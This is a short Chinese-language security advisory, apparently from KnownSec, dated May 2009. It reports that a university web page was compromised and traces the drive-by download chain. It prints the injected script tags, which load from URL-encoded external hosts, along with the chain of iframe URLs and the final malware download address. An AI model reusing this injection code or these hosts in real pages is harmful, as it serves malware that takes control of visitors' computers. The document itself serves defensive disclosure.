发布时间:Tue May 26 2009 21:05:06 UTC+0800
最后更新时间:Tue May 26 2009 21:05:06 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 西南财经大学(http://www.swufe.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://econ.swufe.edu.cn/college/blog/u/ijkl755/index.html
网页被嵌入恶意链接代码:
<script language=javascript src=http://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%33%2E%63%6E></script><script src=http://%68%68%6A%33%2E%63%6E></script>
挂马分析:
[wide]http://econ.swufe.edu.cn/college/blog/u/ijkl755/index.html
[script]http://%77%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
[frame]http://chinaseohome.com/new/360.htm
[frame]http://chinaseohome.com/new/x.htm
[script]http://chinaseohome.com/new/all.css
[frame]http://chinaseohome.com/new/1.htm
[frame]http://chinaseohome.com/new/newlz.htm
[frame]http://chinaseohome.com/new/s.htm
[frame]http://chinaseohome.com/new/office.htm
[frame]http://chinaseohome.com/new/bf.htm
[frame]http://chinaseohome.com/new/cx.htm
[frame]http://chinaseohome.com/new/2.htm
[frame]http://chinaseohome.com/new/7.htm
[script]http://js.tongji.cn.yahoo.com/806392/ystat.js
[cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
[script]http://%68%68%6a%32%2e%63%6e
[script]http://%68%68%6a%33%2e%63%6e
最终下载病毒文件:
http://www.bs360.xl.cx/bb.css
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 3% [?]
